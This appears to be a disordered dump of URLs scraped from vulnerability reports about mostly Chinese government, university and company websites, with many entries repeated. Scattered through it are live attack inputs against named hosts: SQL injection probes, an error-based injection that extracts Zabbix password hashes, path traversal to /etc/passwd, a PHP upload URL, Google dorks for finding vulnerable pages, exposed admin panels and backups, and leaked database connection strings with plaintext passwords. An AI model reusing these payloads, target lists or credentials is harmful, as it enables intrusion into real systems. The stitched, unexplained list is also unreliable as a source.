http://pinge.focus.cn/u/inspiration/ http://www.jxxm.gov.cn/mucc/about.asp?id=51 http://www.jxywj.com/mucc/about.asp?id=67 http://www.jxzxwsy.com/mucc/about.asp?id=47 http://www.jxgzwsy.com/mucc/about.asp?id=47 http://www.jxazwsy.com/mucc/about.asp?id=47 http://www.jxbjy.com/mucc/about.asp?id=47 http://www.jxzlyy.com/mucc/about.asp?id=47 http://www.jxqswsy.com/mucc/about.asp?id=47 http://www.jxsywsy.com/mucc/about.asp?id=47 http://www.jxqsyy.com/mucc/about.asp?id=47 http://www.jxlyjw.com/mucc/about.asp?id=67 http://www.jxjhfzs.com/mucc/about.asp?id=47 http://www.jxjsws.com/mucc/about.asp?id=47 http://www.jxcywsy.com/mucc/about.asp?id=47 http://www.jxlswsy.com/mucc/about.asp?id=47 http://www.jxjbkz.com/mucc/about.asp?id=47 http://www.jxflswsy.com/mucc/about.asp?id=47 http://www.jxdgwsy.com/mucc/about.asp?id=47 http://www.jxlgzwsy.com/mucc/about.asp?id=47 http://www.jxpfz.com/mucc/about.asp?id=47 
http://www.jxmzjw.gov.cn/mucc/about.asp?id=47 http://www.kaida56.cn/mucc/about.asp?id=47 http://www.jxyzwsy.com/mucc/about.asp?id=47 site:189.cn inurl:order http://alumni.hqu.edu.cn/index.php?m=Article&a=article&id=2816&type=0%2C0%2C0 http://www.asp168.com/default.php http://www.asp168.com/default.php?mod=article&fid=40 http://www.13356331388.com/ http://域名/adminqibo5/Login.asp http://www.jxjbkz.com/mucc/about.asp?id=47 http://www.jxlswsy.com/mucc/about.asp?id=47 http://www.jxlyjw.com/mucc/about.asp?id=47 http://www.rzjxxa.com/mucc/about.asp?id=47 http://www.xzh120.com/mucc/about.asp?id=51 http://www.cnhengyuan.net/mucc/about.asp?id=56 http://www.rzscxh.com/mucc/about.asp?id=47 http://www.rzhc.net/mucc/about.asp?id=53 http://www.donghui-steel.com/mucc/about.asp?id=51 http://www.jxrmyy.com/mucc/about.asp?id=55 http://www.kaidajiaxiao.com/mucc/about.asp?id=55 http://www.13356331388.com/mucc/about.asp?id=47 http://www.jxywj.com/mucc/about.asp?id=47 http://www.jxflswsy.com/mucc/about.asp?id=47 http://www.hip.com.cn/magazine/magdet.asp?id=1725 inurl:Showservices.asp?id= inurl:showkbxx.asp?id= inurl:Showservices.asp?id= inurl:showkbxx.asp?id= http://www.zenitsoft.com//admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.php http://gunduzi.duapp.com/ file:///etc/passwd xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006 xmlns:o="urn:schemas-microsoft-com:office:office xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math xmlns:v="urn:schemas-microsoft-com:vml xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing xmlns:w10="urn:schemas-microsoft-com:office:word xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml http://www.fivesoft.com.cn/ http://www.zhgjjt.com:8888/ 
http://www.zhwsbs.gov.cn:9013/shfw/xhTicket/payCtky2.xhtml?we=1&txtSchLocalCode=0001001&txtSchStationName=%25E9%25A6%2599%25E6%25B4%25B2%25E6%2580%25BB%25E7%25AB%2599&txtSchWaitStCode=102017&txtSchDstNode=10001063&txtSchWaitingRoom=&txtSchDate=2014-09-27&txtSchTime=05:30&txtSchWaitStName=%25E9%25A6%2599%25E6%25B4%25B2%25E9%2595%25BF%25E9%2580%2594%25E7%25AB%2599&txtSchDstNodeName=%25E5%25B9%25BF%25E5%25B7%259E&txtSchPrice=65.00&txtSchTicketCount=43&txtNumberTicket=1 https://12XX.XXXX.9X/system/download_cert.php?manager=1&user_id=2&cert_psw=11 https://12XX.XXXX.9X/system/download_cert.php?manager=1&user_id=2&cert_psw=11 http://www.notery.net/ http://www.notery.net/npage.asp?id=19 http://域名/sys/ http://www.kqgzc.com/page.asp?id=638 http://www.hzgzc.com/2009/ http://dxgzccn.cnc119.000pc.net/ http://www.bygzc.cn/old/ http://www.hhhtgzc.com/ http://www.bhgzc.com/ http://sggzccn.cnc506.000pc.net/ http://www.szlive800.com/faq.asp?id=11 http://www.fyxf.fy.cn/index.php?tpl=dispnews&artid=68704 http://www.fyxf.fy.cn/index.php?tpl=dispnews&artid=68704 http://www.tylmw.cn/tjsearch.php?act=save http://www.tylmw.cn/broadband_ajax.php?tstime=1411548817979&key=1 http://www.haitiansoft.com:8080/ http://work.ch.gongchang.com/companyinfo.html http://自己的用户名.cn.gongchang.com/ http://wooyun.cn.gongchang.com/ http://gdtj.chinasarft.gov.cn/wszb/filemanage/ajaxGetDepartList.aspx?departcode= inurl:Pro_shcn.asp?ArticleID= http://www.jhhoek.com/Pro_shcn.asp?ArticleID=1 http://www.scmg.gov.cn/database/jycms.mdb http://www.archives.gov.cn/search/List.jsp?s=archives&g=&k=&pno=1&n=10&mft=&asid=null&mfa=&mfext=&mfsd=&mfed=&mfss=&mfes=&o=&oa=&sp=&xpath=-1&tsct=&ta=&red=&rdd=&ts=&extsearch=y&period=01 http://www.zhcqq.gov.cn/article_guest.asp?guestid=9 http://xhagri.xhkj.gov.cn/news/catalogdetail.asp?catalog_id=5 http://www.lldm.gov.cn/xinxi/news_view.asp?newsid=19 http://www.sqxrsj.gov.cn/vote.asp?inquiryId=1 http://www.fhlr.gov.cn/jzxxread.php?id=293 http://www.hyst.gov.cn/info.asp?cid=41&pid=39 
http://www.xyjd.gov.cn/InfoList.php?S=1 http://www.ywgt.gov.cn/yggc/NewsList.asp?SortID=9 http://www.tlsafety.gov.cn/showall.asp?table=tjs&fid=1&n=%E6%94%BF%E5%8A%A1%E4%BF%A1%E6%81%AF&nn=%E6%9C%BA%E6%9E%84%E8%81%8C%E8%83%BD http://sdlw.lss.gov.cn/bsdt.asp?classid1=389&classname=%E5%85%AC%E5%85%B1%E5%B0%B1%E4%B8%9A%E6%9C%8D%E5%8A%A1 http://hzfx.ahxf.gov.cn/news/list.asp?news_id=509 http://www.ncfdj.gov.cn/CongYeZhuTiXianShi.aspx?ID=20 http://www.ycsdwgk.gov.cn/list.jsp?urltype=tree.TreeTempUrl&wbtreeid=1020 http://www.nhxdj.gov.cn/huodong.jsp?urltype=tree.TreeTempUrl&wbtreeid=6047 http://pxzx.zjdpc.gov.cn/Detail.aspx?t=2&id=8 http://jjw.wensheng.gov.cn/News.aspx?className=%e8%a1%8c%e6%94%bf%e8%ae%b8%e5%8f%af http://www.fjhrss.gov.cn/cjcyxcs.asp?id=78 http://www.jxgtzyj.gov.cn/new.asp?articleid=220&bigclassname=%E6%9C%AC%E5%B1%80%E5%8A%A8%E6%80%81 http://www.jxfgw.gov.cn/info/index.asp?id=1 http://www.nphbj.gov.cn/viewzxzx.asp?id=1424 http://www.gdmz.gov.cn/bbs/rss.php?auth=0 http://www.chsw.gov.cn/about.php?id=1 http://www.wljw.gov.cn/twomore.aspx?id=13 http://www.lfs.gov.cn/cn_asp/subject.asp?typeid=96 http://www.dhrkjs.gov.cn/news_more.asp?lm=17 http://www.yxxdjw.gov.cn/web/news_view.asp?newsid=9797 http://mail.slpop.gov.cn/content.do?method=sendTo&cid=106 http://www.gyfg.gov.cn/cjwdContent.aspx?cjwd_id=187&list_id=11 http://www.szkx.gov.cn/Info_View.aspx?id=454 http://www.sygbzx.gov.cn/News/newlist.do?PrtID=1 http://ysl.daqing.gov.cn/bszn.asp?ClassID=8 http://www.tljw.gov.cn/article.php?MsgId=92911 http://www.haiyou.gov.cn/news.asp?tp=162 www.haiyou.gov.cn http://www.pucheng.gov.cn/about_list.aspx?id=5&oid=1&menus=1 http://www.fnxjw.gov.cn/article.php?MsgId=92530 http://www.lankj.gov.cn/Content.asp?t=%B2%FA%C9%FA%D3%EB%B7%A2%D5%B9&l=1 http://www.hhxz.gov.cn/application/wsbs/bszn/xzzhinanxiang.jsp?ZJJGDM=011387204&depName=%E5%B8%82%E5%8F%91%E6%94%B9%E5%B1%80 http://gzqw.ntgz.gov.cn/default.php?mod=article&settype=0&fid=2443 
http://jgzh.bjmy.gov.cn/showxiangmu7.asp?art_id=110 http://www.asgy.gov.cn/xzsp_x.asp?id=19 http://www.tlmw.gov.cn/Data/Data_content.aspx?trans_data_id=344 http://www.bazhen.gov.cn/sjxx.asp?id=21 http://www.zs-safety.gov.cn/infoList.aspx?ColId=128&SecId=132 http://www.njfwwb.gov.cn/newslist.aspx?news_type=7 http://www.sxcbd.gov.cn/article3.asp?bigid=1&smallid=8&smallid1=14 http://chp.smesd.gov.cn/clist.jsp?id=1453 http://www.dyzw.gov.cn/newsshow.asp?id=7017&c=%D5%FE%B8%AE%CE%C4%B8%E6 http://www.lclz.gov.cn/bigclass.asp?typeid=27&bigclassid=0&smallclassid=0 http://www.jlcg.gov.cn/listnews1.asp?nid=2727 http://www.xdj.gov.cn/vote/show.asp?VoteID=4 http://www.xjxngo.gov.cn/content.asp?id=5 http://www.pj148.gov.cn/info/infomore.asp?id=T0202 http://www.chhb.gov.cn/xc.asp?id=3 http://big5.pingdu.gov.cn/Plugin/huisinvote/DynamicWeb.aspx?voteID=25 http://www.sdlqrd.gov.cn/type.asp?ID=12 http://www.xaagri.gov.cn/ggny/list.aspx?area=%E6%88%B7%E5%8E%BF http://www.wjlf.gov.cn/news_info/list.asp?sort_id=14 http://www.hbcy.gov.cn/application/zwgk/xzzhinanxiang.jsp?dhbt=%E5%8A%9E%E4%BA%8B%E6%8C%87%E5%8D%97&ZJJGDM=01114101X&depName=%E9%95%BF%E9%98%B3%E5%8E%BF%E5%9B%BD%E5%9C%9F%E8%B5%84%E6%BA%90%E5%B1%80 http://www.scbz.hrss.gov.cn/Class.asp?PrdID=124&ClassID=125&ClassName=%E6%9C%BA%E6%9E%84%E8%AE%BE%E7%BD%AE http://www.lyqrd.gov.cn/ShowNews.asp?id=1007 http://xxgk.cicheng.gov.cn/news_more.asp?id=1 http://www.aqjj.gov.cn/cgs/shownews.asp?id=801 http://qzlx.aqcz.gov.cn/show.php?id=339 http://www.hnxdj.gov.cn/news_more.asp?lm=&lm2=83&open=_blank&tj=0&hot=0 http://jsj.btdsss.gov.cn/index.jsp?urltype=tree.TreeTempUrl&wbtreeid=10761 http://zzb.btdsss.gov.cn/list.jsp?urltype=tree.TreeTempUrl&wbtreeid=10718 http://www.cxzfj.gov.cn/wzphoto.asp?id=10768 http://www.scncjt.gov.cn/mail.aspx?type=2 http://www.whjjw.gov.cn/article.php?MsgId=92974 http://xilin.gov.cn/app/online/PageView.jsp?id=794850e035fc11e3832af80f41f81b9d http://www.xaagri-net.gov.cn/contoctus.asp?id=24 
http://dez.sxjs.gov.cn/Category.aspx?lx=01 http://dgjx.dg.gov.cn/player.asp?id=86 http://www.pkgt.gov.cn/List.asp?Catalog=23 http://www.edu-gzstats.gov.cn/show/showarticle.asp?ID=770 http://www.bzzj.gov.cn/mail/newmail.asp?class=14 http://www.jrzgh.gov.cn/onews.asp?id=213 http://www.pjngo.gov.cn/content.asp?id=5 http://www.jdztby.gov.cn/xxzx/infodetail.asp?Catalog=%5C%E5%A4%AA%E7%99%BD%E5%9B%AD%E8%A1%97%E9%81%93%5C%E6%9C%80%E6%96%B0%E5%85%AC%E5%91%8A%5C&Mov_ID=4096 http://www.chswsj.gov.cn/show.asp?id=701&Bid=8&Sid= http://www.rcxgaj.gov.cn/guestbook/list.aspx?classid=2&isSearch=0 http://www.sdxtgh.gov.cn/infolist.asp?id=1453&big=1&small=2 http://www.yangdong.gov.cn/lj/lxshow.asp?id=15435 http://yysmzx.yyedu.gov.cn/files/boardshow.asp?B_id=93&CategoryName=%E5%85%AC%E5%91%8A http://www.paitou.gov.cn/articlelist_zt_news.asp?classid=20140401 http://www.mazhan.gov.cn/news.asp?SmallClassID=7&BigClassID=16 http://www.abaj.gov.cn/down_show.asp?id=62 http://www.ahrfb.gov.cn/sitecn/minfo.aspx?id=300 http://www.jixiandj.gov.cn/list.jsp?wbtreeid=1002 http://www.chinatalents.gov.cn/bshz/detail.aspx?pageid=355 http://www.qhdm.gov.cn/xinxi/news_view.asp?newsid=18 http://www.liuba.gov.cn/copy_1_copy_3_lmy.jsp?urltype=tree.TreeTempUrl&wbtreeid=1363 http://www.gzpy519.gov.cn/zwgk/tztg_list.asp?ptype=%CD%A8%D6%AA%CD%A8%B8%E6 http://www.tcprice.gov.cn/xinwen/News.aspx?sort=001002 http://smwsbsdt.xintai.gov.cn/permissionitem_list_Sort.jspx?sortcode=001001012&areaid=370982 http://www.zjsw.gov.cn/list_content.php?newsid=835&newstypeid=38 http://gcjs.pucheng.gov.cn/list.aspx?id=70 http://www.hhxjw.gov.cn/news_more.asp?lm2=107 http://gsgajt.gov.cn/NewsShow.aspx?id=26210 http://www.hyjwjc.gov.cn/index_lzjyshow.asp?id=2&cdr=%E8%AF%BB%E4%B9%A6%E6%80%9D%E5%BB%89 http://www.yqgtzyj.gov.cn/about.asp?id=37 http://www.aqthjjjc.gov.cn/article.php?MsgId=91265 http://sp.sxfz.gov.cn/bookshow.asp?id=156 http://www.gzq.gov.cn/zmhd/zxdc_form.jsp?catid=50%7C118&id=3 
http://www.jnqngo.gov.cn/content.asp?id=5 http://www.gzny.gov.cn/e/tool/gbook/index1sly.php?lyid=1713 http://www.jhsafety.gov.cn/View_1.asp?id=3476 http://www.wxncdj.gov.cn/BulletinShow.aspx?cid=51 http://www.jiancha.bjshy.gov.cn/dtlevel2.jsp?caid=009 http://www.huayuan.gov.cn/gonggaoshow.asp?id=17 http://www.yiwufg.gov.cn/forDev/ysz.php?pid=5754 http://www.ymhmw.gov.cn/cun/c_index.asp?tid=667 http://people.nbfet.gov.cn/hyzsxi.php?id=519 http://shx.smesd.gov.cn/list.jsp?id=1346 http://fda.nbjiangbei.gov.cn/zxbs-4.aspx?classid=65 http://fzb.zjj.gov.cn/deptemplates/v7/news.jsp?topid=002003065&columnid=002003065002002 http://youth.whx.gov.cn/ArticleContent.asp?ID=2971 http://www.jsjcy.gov.cn/config.asp?id=6 http://yljy.10.gov.cn/article.asp?class=8 http://www.jintang.gov.cn/Investment/list.jsp?ClassID=02011701 http://www.massfj.gov.cn/old/news_detail.asp?id=4356 http://www.fshlx.gov.cn/ins.asp?t=1&s=8&i=17 http://www.bjsgsl.gov.cn/newlist.php?id=17 http://www.hsepb.gov.cn/ztzl.asp?SpecialID=16 http://www.dttour.gov.cn/shownewsfile.asp?id=968&title=%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%9B%BD%E9%99%85%E5%B8%90%E7%AF%B7%E9%9F%B3%E4%B9%90%E8%8A%82%E5%8A%A8%E5%91%98%E5%A4%A7%E4%BC%9A%E4%B8%BE%E8%A1%8C http://www.ahczjj.gov.cn/ShowNews.asp?id=1677 http://www.nmwhrd.gov.cn/readnews.php?class=%E5%B8%B8%E5%A7%94%E4%BC%9A%E4%BC%9A%E8%AE%AE http://www.pxngo.gov.cn/content.asp?id=5 http://qw.hrbcs.gov.cn/newslist.jsp?lmid=76 http://www.xcrf.gov.cn/look_page_2.asp?yiid=32&erid=22 http://www.jrfgw.gov.cn/onews.asp?id=2468 http://lgpf.gov.cn/vote/view.asp?id=12 http://huanbao.shishi.gov.cn/Picture/ShowPicture.asp?id=18 http://xs.ycga.gov.cn/default.php?mod=article&fid=5 http://www.ycsjsj.gov.cn/list.asp?borderid=54 http://www.cqitpo.gov.cn/optitude/download.jsp?menuid=10 http://www.jsgyrc.gov.cn/grqz/show.asp?id=2254 http://www.jianwei.bjshy.gov.cn/rdfk/shownews.asp?newsid=1262 http://www.hhscj.gov.cn/picshow.aspx?id=999 http://www.jlszgyj.gov.cn/seenews_info.asp?newsid=383 
http://www.baotingdj.gov.cn/showdongtai.asp?id=719 http://nbdsly.gov.cn/gzdt_1.aspx?id=11 http://www.hljzx.gov.cn/Master/Wymldutylist.aspx?S_ID=259&CMD=look http://119.57.67.200:8080/swtg/login.action http://glxy.chinamobile.com/news/chooseNews.html?id=257 www.jsxh.com.cn/admin/Admin.aspx http://www.13356331388.com/ http://域名/adminqibo5/Login.asp http://www.jxjbkz.com/ http://www.jxlswsy.com/ http://www.jxlyjw.com/ http://www.rzjxxa.com/ http://www.xzh120.com/ http://www.cnhengyuan.net/ http://www.rzscxh.com/ http://www.rzhc.net/ http://www.donghui-steel.com/ http://www.jxrmyy.com/ http://www.kaidajiaxiao.com/ http://www.13356331388.com/ http://www.jxywj.com/ http://www.jxflswsy.com/ http://www.jxxm.gov.cn/mucc/shownews.asp?id=1030 http://www.notery.net/ http://www.notery.net/npage.asp?id=19 http://域名/sys/ http://www.kqgzc.com/list.asp?kind=wcfc http://www.kqgzc.com/list.asp?kind=alfx http://www.kqgzc.com/list.asp?kind=bzzn http://www.kqgzc.com/list.asp?kind=ywfw http://www.hzgzc.com/2009/list.asp?kind=bzzn http://dxgzccn.cnc119.000pc.net/list.asp?kind=bzzn http://www.bygzc.cn/old/list.asp?kind=bzzn http://www.hhhtgzc.com/list.asp?kind=bzzn http://www.bhgzc.com/list.asp?kind=bzzn http://sggzccn.cnc506.000pc.net/list.asp?kind=bzzn http://jssccx.zjt.gov.cn/PractitionPersonnel/Search/frame.aspx?dw=-1&ry=-1&iURLFlag=9 http://jssccx.zjt.gov.cn/PractitionPersonnel/Search/Personnel_resume.aspx?idcard=610404196307101032&name=%E6%9D%8E%E5%AD%A6%E5%8D%AB&type=0 http://www.gzyj.com/search.html www.nkpx.com的。但是因为权限不够,无法访问。 http://www.hbycscjzx.com//OperationManage/DownFile.aspx www.hbycscjzx.com http://www.13356331388.com/ http://域名/adminqibo5/Login.asp http://www.jxjbkz.com/ http://www.jxlswsy.com/ http://www.jxlyjw.com/ http://www.rzjxxa.com/ http://www.xzh120.com/ http://www.cnhengyuan.net/ http://www.rzscxh.com/ http://www.rzhc.net/ http://www.donghui-steel.com/ http://www.jxrmyy.com/ http://www.kaidajiaxiao.com/ http://www.13356331388.com/ http://www.jxywj.com/ 
http://www.jxflswsy.com/ http://www.cnhengyuan.net/mucc/tupianshow.asp?id=437 http://51good.3322.org:9527/ http://wap.91160.com出现了sql注入 http://wap.91160.com/index.php?a=index&c=scan&code=1%27%22 http://api.91160.com/出现了弱口令 http://wxmge.91160.com/main/login.html http://kczy.zjut.edu.cn/gene/user_login.asp http://www.wwawwo.com/productinfo.php?id=294 http://www.wugang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.wugang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.wugang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.sdjs.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.taojiang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://anxiang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.czjj.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://gjdx.sd.vnet.cn http://gjdx.sd.vnet.cn/findPassword.html http://gjdx.sd.vnet.cn/findPassword.do http://www.rcwl.net/b/tea/table_list.jsp?typeId=1 http://www.rcwl.net/b/tea/table_list.jsp?typeId=1 http://sc.zhidao.189.cn http://sc.zhidao.189.cn/scene/deals!detail.do?id=1137496 http://www.lifetour.com.tw/fckeditor/editor/filemanager/connectors/test.html# http://www.lifetour.com.tw//eWeb_lifetour/file/zz22.asp/00026844.txt http://www.lifetour.com.tw:8000/default_lifetour.asp http://www.uc56.com:80/cn/job/recruitments www.bhcwl.com http://www.syyxbj.com/textcon.asp?id=2 http://www.lnhfrc.com/textcon.asp?c=1&id=123 http://www.spring0416.com/textcon.asp?id=106 http://www.shiyedianji.com/textcon.asp?id=170 http://www.syhqgs.cn/textcon.asp?id=105 http://www.syjihong.com/textcon.asp?id=106 http://www.dfcbaby888.com/textcon.asp?id=2 http://sytq.net/en/textcon.asp?id=38 http://www.sydbl.com/textcon.asp?id=106 http://syrixing.com/textcon.asp?id=2 
http://www.lneca.cn/textcon.asp?id=122 http://shiyedianji.com/textcon.asp?id=176 http://www.syperfect.com/textcon.asp?id=153 http://sytq.net/textcon.asp?id=6 http://www.syrixing.com/textcon.asp?id=3 http://www.lneca.cn/textcon.asp?id=122 http://www.sysbio.org.cn/ShowInfo.php?id=660 http://ktv.cms.bookinge.com/ http://www.wintour.cn/case.html inurl:register.html http://www.weimob.com/MemManage/MemberExport/aid/330896/keyword-input//type//integral-grade http://www.weimob.com/MemManage/MemberExport/aid/330896 http://202.101.157.209:81/Cache/RECYCLER.rar http://202.101.157.209:81/html/jk_patient_in_hospital.rar http://202.101.157.209:81/html/admin.asp http://202.101.157.209:81/admin.asp http://psych.ccnu.edu.cn/viewsite.action http://www.fl.zjut.edu.cn/admin/ http://210.32.200.240:20000/w/1/login.asp http://3g.***.cn/mb_msgTransmit.asp?msgid=0890000 http://3g.***.cn/mb_msgTransmit.asp?msgid=1897873 http://www.wintour.cn http://www.xfi-hotel.com/admin http://www.xfi-hotel.com/ http://www.lido-hotel.cn/ http://www.panyuhotel.com/ http://www.redstarhotel.com/ www.hisunsray.com http://www.hisunsray.com/news/comp_view.asp?fileid=10485729&typeId=2550 http://www.xmqcz.com/listbbs.php?fid=15 http://61.175.197.109/ http://love.163.com/2772876 http://arab.bfsu.edu.cn/index.php/Index/alist/id/13 http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://www.sytq.net/news.asp?ss=5&big=14&id=2 http://218.64.81.15/mspowerwgi/web/Prog-info.action http://218.64.81.15/mspowerwgi/web/Index-index.action http://218.64.81.15/mspowerwgi/web/Index-indexForOut.action http://218.64.81.15/mspowerwgi/style.jsp http://61.175.197.98/login.html http://61.175.197.101/XT_Login/ 
https://code.csdn.net/keys http://www.sz-ss.net/Advantage/anlizhanshi/ http://www.999star.com/ http://pc.mmb.cn/wap/pc/index.jsp http://219.141.157.7/index.php?m=user&a=login http://home.ciwong.com/ http://i.ciwong.com/用户ID http://122.224.174.180/ http://ccr.bnu.edu.cn/viewstunews.php?id=56 http://www.weimob.com/tg/manager/user/UserExport/mobile//aid/49 http://www.weimob.com/tg/manager/order/detailPage/order_id/17280 http://www.weimob.com/tg/manager/order/indexPage/aid/49 http://222.189.228.200:8080/ http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://www.ncbhcwl.com/newscon.asp?big=6&id=558 http://reprod.njmu.edu.cn/hspd/proteinview.py?pro=IPI00022774 inurl:application/zwdt post:keyword= http://www.lzxzsp.gov.cn http://www.lzxzsp.gov.cn/application/zwdt/query.jsp http://www.lzxzsp.gov.cn/application/zwdt/query.jsp http://www.cqwsxzfw.com/ http://www.cqwsxzfw.com/application/zwdt/query.jsp http://www.cqwsxzfw.com/application/zwdt/query.jsp http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://web6.sydxbj.com/newslist.asp?big=6 http://www.synl.ac.cn/cg_content.asp?id=87 http://www.synl.ac.cn/cg_content.asp?id=87+and+1=1 http://www.synl.ac.cn/cg_content.asp?id=87+and+1=2 http://oa.ubox.cn/seeyon/management/status.jsp http://urp.nankai.edu.cn/personalInfo/photo?id=MTEyMDEwMDE2Mg== 
http://58.213.145.38/fckEditor/editor/filemanager/connectors/test.html http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://www.sytq.net/procon.asp?big=17&id=37 http://www.jscity.net/phpmyadmin http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://www.sytq.net/prolist.asp?big=56 http://www.jigang.com.cn/main/fabu/s_002.jsp?id=21684 http://www.lianping.gov.cn/sofpro/gecs/consulmanage/dgzt_consul_detail2.jsp?consult_seq=260&type=4 http://www.lianping.gov.cn/sofpro/ge http://sqlmap.org http://www.ctrip.com/member/confirm.asp?uid=10000&spec=890294 http://www.ctrip.com/member/confirm.asp?uid=_1&spec=890294 http://www.archives.sdu.edu.cn/publish/downloadForPublish.do?filePath=../../../../../../../../../../etc/passwd http://www.cbs.sdu.edu.cn//2009/daohangarticle.php?id=20/**/AND/**/447=448 http://www.xanet.cc/ inurl:index.php?m=Index” http://www.sxnjd.com/index.php?m=Index&a=lists&catid=74 http://www.shengsang.com/index.php?m=Index&a=shows&catid=97&id=141 http://www.sxxfj.com/index.php?m=Index&a=shows&catid=20&id=229 http://www.yyldb.com/index.php?m=Index&a=shows&catid=103&id=182 http://www.xasitan.com/index.php?m=Index&a=lists&catid=74 http://www.xahqzd.com/index.php?m=Index&a=lists&catid=94 http://www.xiaoyangkaorou.com/index.php?m=Index&a=shows&catid=113&id=460 http://www.yaxiushop.com/index.php?m=Index&a=lists&catid=94 
www.iecworld.com inurl:web_list_result.jsp?questionnaire_id= http://xfb.lianping.gov.cn/sofpro/gecs/questionnaire/index_list_other.jsp?questionnaire_id=3 http://xfb.lianping.gov.cn/sofpro/gecs/questionnaire/web_list_result.jsp?questionnaire_id=3 http://lianping.gov.cn/sofpro/gecs/questionnaire/web_list_result.jsp?questionnaire_id=3 http://lianping.gov.cn/sofpro/gecs/questionnaire/index_list_other.jsp?questionnaire_id=3 http://www.ezhou.gov.cn/ http://www.ezhou.gov.cn/upimages/file/jm.asp http://www.95598.cn/person/index.shtml http://113.204.136.84/ http://113.204.136.84/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://zyhjxy.scau.edu.cn/special/10junxun//admin/FCKeditor/editor/filemanager/connectors/test.html# http://ee.xjtu.edu.cn/eecjob/showjobfind.php?id=1 http://www.weimob.com/Wealbums/Editalbums/aid/330946/abid/151032 http://www.weimob.com/Wealbums/Editalbums/aid/330946/abid/15103 http://www.weimob.com/Wealbums/Editalbums/aid/330946/abid/151 http://branch.gdpu.edu.cn/huli/test//admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.lnsme.gov.cn/lncms/wooyun.txt https://github.com/gayayzy/fdd-web/blob/master/fdd-web/config/common.php ssl://smtp.exmail.qq.com http://bbs.ickey.cn/ http://bbs.ickey.cn/user-login.html http://wooyun.org/bugs/wooyun-2010-053280 http://www.ynf.gov.cn/ http://bbs.ickey.cn/ http://bbs.ickey.cn/user-register.html http://common.hao123.com/comment/yingshizhuanti_tieba/list?item_id=1410770944&page=2 http://www.hao123.com/topic/wqa http://e.nuaa.edu.cn/ http://e.nuaa.edu.cn/hsxt/gsan1.jsp http://121.14.4.178/portal/framework/jsp/error/error.jsp(已被删) http://121.14.4.151:88/ui/js/error.jsp(已被删) 
jdbc:mysql://10.2.31.254:3306/bss_xinnet?user=xbss&password=xbss#E$R%T jdbc:jtds:sqlserver://10.2.24.241:1433;databaseName=XIN_ICPInfomation;user=sa;password=123456 user:password@host xinnetowner:buzwax2vnnvb#uathx77sfszksYmsd@10.2.24.95 user:password@host xinnetowner:buzwax2vnnvb#uathx77sfszksYmsd@10.2.24.96 http://www.v2tech.com/products/v2conf.jsp http://mail.chinaconveyor.com/Conf/jsp/main/mainAction.do http://www.hnsj1992.com.cn:18080/V2Conf/jsp/user/loginAction.do http://vc.transglobe.com.tw/V2Conf/jsp/user/loginAction.do http://sphys2.pdqmjt.net:18080/Conf/jsp/user/loginAction.do http://supe.com.cn:443/V2Conf/jsp/main/mainAction.do http://gdjsds.com:443/V2Conf/jsp/user/loginAction.do;jsessionid=3544C3E805F842C9A83D4EB011629344 http://baodai.cn/Conf/jsp/user/loginAction.do http://220.178.74.178:8080/Conf/jsp/main/mainAction.do http://110.52.144.22:18080/V2Conf/jsp/user/loginAction.do 